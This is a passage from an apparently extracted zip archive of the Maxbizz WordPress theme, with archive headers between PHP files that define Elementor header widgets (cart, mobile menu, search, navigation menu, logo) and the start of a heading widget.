namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Cart
 */
class Maxbizz_Cart extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'icart';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Cart Header', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-cart';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz_header' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'style_icon_section',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'icon_size',
			[
				'label' => __( 'Icon Size', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 50,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .octf-cart i:before' => 'font-size: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'icon_color',
			[
				'label' => __( 'Icon Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .octf-cart i' => 'color: {{VALUE}};',
				]
			]
		);
		
		$this->add_control(
			'bg_count',
			[
				'label' => __( 'Background Count', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .octf-cart .count' => 'background: {{VALUE}};',
				],
				'separator' => 'before',
			]
		);
		$this->add_control(
			'count_color',
			[
				'label' => __( 'Count Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .octf-cart .count' => 'color: {{VALUE}};',
				]
			]
		);

		$this->end_controls_section();
		
	}

	public static function maxbizz_render_menu_cart() {
		if ( null === WC()->cart ) {
			return;
		}
		$product_count = sprintf ( _n( '%d', '%d', WC()->cart->get_cart_contents_count() ), WC()->cart->get_cart_contents_count() );
		$cart_url = esc_url( wc_get_cart_url() );

		$widget_cart_is_hidden = apply_filters( 'woocommerce_widget_cart_is_hidden', false );
		?>
		<?php if ( ! $widget_cart_is_hidden ) : ?>
			<div class="octf-cart octf-cta-header">
				<a class="cart-contents ot-minicart" href="<?php echo $cart_url; ?>" title="<?php esc_attr_e( 'View your shopping cart', 'maxbizz' ); ?>"><i class="ot-flaticon-business"></i> <span class="count"><?php echo $product_count; ?></span>
				</a>
				<?php if( !is_cart() && !is_checkout() ) { ?>
				<div class="site-header-cart">
					<?php the_widget( 'WC_Widget_Cart', array( 'title' => '' ) ); ?>
				</div>	
				<?php } ?>
			</div>
		<?php endif; ?>
		<?php
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		self::maxbizz_render_menu_cart();
	}

	protected function _content_template() {}
}
// After the Maxbizz_Cart class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Cart() );PK�8FZR�~4inc/backend/elementor/widgets/header/menu-mobile.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Menu_Mobile
 */
class Maxbizz_Menu_Mobile extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'imenu_mobile';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Menu Mobile', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-select';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz_header' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Menu', 'maxbizz' ),
			]
		);

		$menus = $this->get_available_menus();
		$this->add_control(
			'nav_menu',
			[
				'label' => esc_html__( 'Select Menu', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'multiple' => false,
				'options' => $menus,
				'default' => array_keys( $menus )[0],
				'save_default' => true,

			]
		);

		$this->add_control(
			'pos_menu',
			[
				'label' => __( 'Position', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => 'on-right',
				'options' => [
					'on-left' 	=> __( 'On Left', 'maxbizz' ),
					'on-right'  => __( 'On Right', 'maxbizz' ),
				]
			]
		);

		$this->end_controls_section();
		
		/*** Style ***/
		$this->start_controls_section(
			'style_icon_section',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'icon_color',
			[
				'label' => __( 'Icon Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .mmenu-toggle button' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'icon_size',
			[
				'label' => __( 'Icon Size', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 50,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .mmenu-toggle i:before' => 'font-size: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'style_mmenu_section',
			[
				'label' => __( 'Menu', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'bg_mmenu',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .mmenu-wrapper' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'color_mmenu',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .mmenu-wrapper .mobile_mainmenu li a, {{WRAPPER}} .mmenu-wrapper .mobile_mainmenu > li.menu-item-has-children .arrow i' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'bcolor_mmenu',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .mmenu-wrapper .mobile_mainmenu li a' => 'border-color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'mmenu_typography',
				'selector' => '{{WRAPPER}} .mmenu-wrapper .mobile_mainmenu li a',
			]
		);
		$this->add_control(
			'color_back',
			[
				'label' => __( 'Back Button Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .mmenu-wrapper .mmenu-close' => 'color: {{VALUE}};',
				]
			]
		);

		$this->end_controls_section();
	}

	protected function get_available_menus(){

		$menus = wp_get_nav_menus();
		$options = [];

		foreach ( $menus as $menu ) {
			$options[ $menu->slug ] = $menu->name;
		}

		return $options;
   }

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>
			
	    	<div class="octf-menu-mobile octf-cta-header">
				<div id="mmenu-toggle" class="mmenu-toggle">
					<button><i class="ot-flaticon-menu"></i></button>
				</div>
				<div class="site-overlay mmenu-overlay"></div>
				<div id="mmenu-wrapper" class="mmenu-wrapper <?php echo $settings['pos_menu']; ?>">
					<div class="mmenu-inner">
						<a class="mmenu-close" href="#"><i class="ot-flaticon-arrowsoutline"></i></a>
						<div class="mobile-nav">
							<?php
								wp_nav_menu( array(
									'menu' 			 => $settings['nav_menu'],
									'menu_class'     => 'mobile_mainmenu none-style',
									'container'      => '',
								) );
							?>
						</div>   	
					</div>   	
				</div>
			</div>
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Menu_Mobile class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Menu_Mobile() );PK�8FZ<�ܝ��/inc/backend/elementor/widgets/header/search.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Search
 */
class Maxbizz_Search extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'isearch';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Search Header', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-search';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz_header' ];
	}

	protected function _register_controls() {
		
		/*** Style ***/
		$this->start_controls_section(
			'style_icon_section',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'icon_size',
			[
				'label' => __( 'Icon Size', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 50,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .toggle_search i:before' => 'font-size: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'icon_color',
			[
				'label' => __( 'Icon Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .toggle_search i' => 'color: {{VALUE}};',
				]
			]
		);
		
		$this->end_controls_section();

		$this->start_controls_section(
			'style_form_section',
			[
				'label' => __( 'Form', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'form_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 200,
						'max' => 500,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .h-search-form-field' => 'width: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'bg_form_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .h-search-form-inner, {{WRAPPER}} .h-search-form-field:after' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'form_radius',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .h-search-form-inner' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'form_shadow',
				'selector' => '{{WRAPPER}} .h-search-form-inner',
			]
		);
		$this->add_control(
			'input_title',
			[
				'label' => __( 'Input', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'text_form_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .h-search-form-inner input, {{WRAPPER}} .h-search-form-inner button, {{WRAPPER}} .h-search-form-inner ::placeholder' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'border_input_color',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .h-search-form-inner input' => 'border-color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'btn_title',
			[
				'label' => __( 'Button', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'btn_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .search-form .search-submit i' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'bg_btn',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .search-form .search-submit' => 'background: {{VALUE}};',
				]
			]
		);

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>
			
	    	<div class="octf-search octf-cta-header">
				<div class="toggle_search octf-cta-icons">
					<i class="ot-flaticon-search-1"></i>
				</div>
				<!-- Form Search on Header -->
				<div class="h-search-form-field">
					<div class="h-search-form-inner">
						<?php get_search_form(); ?>
					</div>									
				</div>
			</div>
		    
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Search class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Search() );PK�8FZ�A�H�!�!-inc/backend/elementor/widgets/header/menu.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Menu
 */
class Maxbizz_Menu extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'imenu';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Nav Menu', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-nav-menu';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz_header' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Menu', 'maxbizz' ),
			]
		);

		$menus = $this->get_available_menus();
		$this->add_control(
			'nav_menu',
			[
				'label' => esc_html__( 'Select Menu', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'multiple' => false,
				'options' => $menus,
				'default' => array_keys( $menus )[0],
				'save_default' => true,

			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				'selectors' => [
					'{{WRAPPER}}' => 'text-align: {{VALUE}};',
				],
			]
		);

		$this->end_controls_section();

		/*** Style ***/
		//menu parents
		$this->start_controls_section(
			'style_menu_section',
			[
				'label' => __( 'Menu Parents', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'space_item',
			[
				'label' => __( 'Spacing Items', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .main-navigation > ul > li' => 'margin: 0 {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .main-navigation > ul > li:last-child' => 'margin-right: 0;',
					'{{WRAPPER}} .main-navigation > ul > li:first-child' => 'margin-left: 0;',
				],
			]
		);
		$this->add_control(
			'text_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .main-navigation > ul > li > a' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'arrow_color',
			[
				'label' => __( 'Arrow Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .main-navigation > ul > li.menu-item-has-children > a:after' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'text_hover_color',
			[
				'label' => __( 'Text Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .main-navigation ul > li:hover > a, {{WRAPPER}} .main-navigation ul > li.menu-item-has-children:hover > a:after' => 'color: {{VALUE}};',
					'{{WRAPPER}} .main-navigation > ul > li:before' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'menu_typography',
				'selector' => '{{WRAPPER}} .main-navigation > ul',
			]
		);

		$this->end_controls_section();

		//menu child
		$this->start_controls_section(
			'style_smenu_section',
			[
				'label' => __( 'Dropdown Menus', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'smenu_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 250,
						'max' => 700,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .main-navigation ul li ul' => 'width: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'smenu_radius',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .main-navigation ul ul' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
				'separator' => 'before',
			]
		);
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'smenu_shadow',
				'selector' => '{{WRAPPER}} .main-navigation ul ul',
				'separator' => 'before',
			]
		);
		$this->add_control(
			'bg_s_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .main-navigation ul ul, {{WRAPPER}} .main-navigation ul ul:after' => 'background: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'item_title',
			[
				'label' => __( 'Menu Items', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'text_s_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .main-navigation ul ul a, {{WRAPPER}} .main-navigation ul ul > li.menu-item-has-children > a:after' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'text_s_hover_color',
			[
				'label' => __( 'Text Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .main-navigation ul ul a:hover, {{WRAPPER}} .main-navigation ul ul li.current-menu-item > a, {{WRAPPER}} .main-navigation ul > li.menu-item-has-children > a:hover:after' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'bg_s_hover_color',
			[
				'label' => __( 'Background Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .main-navigation ul li li a:hover, {{WRAPPER}} .main-navigation ul ul li.current-menu-item > a' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'border_s_color',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .main-navigation ul li li a' => 'border-color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'smenu_typography',
				'selector' => '{{WRAPPER}} .main-navigation ul ul a',
				'separator' => 'before',
			]
		);

		$this->end_controls_section();

	}

	protected function get_available_menus(){

		$menus = wp_get_nav_menus();

		$options = [];

		foreach ( $menus as $menu ) {
			$options[ $menu->slug ] = $menu->name;
		}

		return $options;
   }

   	protected function render() {
		$settings = $this->get_settings_for_display();
		$active_mmenu = in_array('ot_mega-menu/ot_mega-menu.php', apply_filters('active_plugins', get_option('active_plugins')));
	?>
			<nav id="site-navigation" class="main-navigation">			
				<?php
					wp_nav_menu( array(
						'menu' 			 => $settings['nav_menu'],
						'menu_id'        => 'primary-menu',
						'container'      => 'ul',
						'theme_location' => '__no_such_location',
    					'fallback_cb'    => '__return_empty_string', 
    					'walker'         => $active_mmenu ? new \Ot_Mega_Menu_Walker() : '',
					) );
				?>
			</nav>
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Menu class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Menu() );PK�8FZ
�N��
�
-inc/backend/elementor/widgets/header/logo.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Logo
 */
class Maxbizz_Logo extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'ilogo';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Logo', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-logo';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz_header' ];
	}

	protected function _register_controls() {

		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Logo', 'maxbizz' ),
			]
		);

		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				'selectors' => [
					'{{WRAPPER}} .the-logo' => 'text-align: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'logo_image',
			 [
				'label' => esc_html__( 'Image', 'maxbizz' ),
				'type'  => Controls_Manager::MEDIA,
				'default' => [
					'url' => get_template_directory_uri().'/images/logo.svg',
				],
			 ]
		);

		$this->add_responsive_control(
			'logo_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 500,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .the-logo img' => 'width: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_responsive_control(
			'logo_height',
			[
				'label' => __( 'Height', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 300,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .the-logo img' => 'height: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();
		
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>
			
	    	<div class="the-logo">
				<a href="<?php echo esc_url( home_url( '/' ) ); ?>">
					<img src="<?php echo esc_attr( $settings['logo_image']['url'] ); ?>" alt="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>">
				</a>			        
		    </div>
		    
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Logo class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Logo() );PK�8FZ)�����)inc/backend/elementor/widgets/heading.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Heading 
 */
class Maxbizz_Heading extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iheading';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Heading', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-icon-box';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	public static function get_subtitle_style() {
		return [
			'' 				=> __( 'Default', 'maxbizz' ),
			'is_highlight' 	=> __( 'Highlight', 'maxbizz' ),
			'is_line' 		=> __( 'Line', 'maxbizz' ),
		];
	}

	protected function _register_controls() {

		//Content Service box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
			]
		);

		$this->add_control(
			'sub',
			[
				'label' => __( 'Subtitle', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'dynamic' => [
					'active' => true,
				],
				'default' => __( 'our services', 'maxbizz' ),
				'placeholder' => __( 'Enter your subtitle', 'maxbizz' ),
				'label_block' => true,
			]
		);

		$this->add_control(
			'title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'dynamic' => [
					'active' => true,
				],
				'default' => __( 'What we do', 'maxbizz' ),
				'placeholder' => __( 'Enter your title', 'maxbizz' ),
				'label_block' => true,
			]
		);
		$this->add_control(
			'header_size',
			[
				'label' => __( 'Title HTML Tag', 'elementor' ),
				'type' => Controls_Manager::SELECT,
				'options' => [
					'h1' => 'H1',
					'h2' => 'H2',
					'h3' => 'H3',
					'h4' => 'H4',
					'h5' => 'H5',
					'h6' => 'H6',
					'div' => 'div',
					'span' => 'span',
					'p' => 'p',
				],
				'default' => 'h2',
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				// 'prefix_class' => 'maxbizz%s-align-',
				'selectors' => [
					'{{WRAPPER}}' => 'text-align: {{VALUE}};',
				],
				'default' => '',
			]
		);

		$this->end_controls_section();

		//Style
		$this->start_controls_section(
			'style_section',
			[
				'label' => __( 'Heading', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Subtitle
		$this->add_control(
			'heading_stitle',
			[
				'label' => __( 'Subtitle', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$this->add_control(
			'subtitle_style',
			[
				'label' => __( 'Subtitle Style', 'maxbizz' ),
				'type' => Controls_Manager::SELECT,
				'default' => '',
				'options' => self::get_subtitle_style(),
			]
		);
		$this->add_responsive_control(
			'line_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 20,
						'max' => 100,
					],
				],
				'default' => [
					'unit' => 'px',
					'size' => 45,
				],
				'selectors' => [
					'{{WRAPPER}} .ot-heading > span.is_line:before' => 'width: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .ot-heading > span.is_line' => 'padding-left: calc({{SIZE}}{{UNIT}} + 15px);',
				],
				'condition'	=> [
					'subtitle_style'	=> 'is_line'
				]
			]
		);

		$this->add_control(
			'stitle_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-heading > span' => 'color: {{VALUE}}; border-color: {{VALUE}};',
					'{{WRAPPER}} .ot-heading > span.is_line:before' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'stitle_bg',
			[
				'label' => __( 'Background color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-heading > span' => 'background: {{VALUE}};',
				],
				'condition'	=> [
					'subtitle_style'	=> 'is_highlight'
				]
			]
		);
		$this->add_control(
			'stitle_border',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-heading > span' => 'border-color: {{VALUE}};',
				],
				'condition'	=> [
					'subtitle_style'	=> 'is_highlight'
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'stitle_typography',
				'selector' => '{{WRAPPER}} .ot-heading > span',
			]
		);
		$this->add_responsive_control(
			'stitle_bottom_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-heading > span' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);

		//Title
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'title_color',
			[
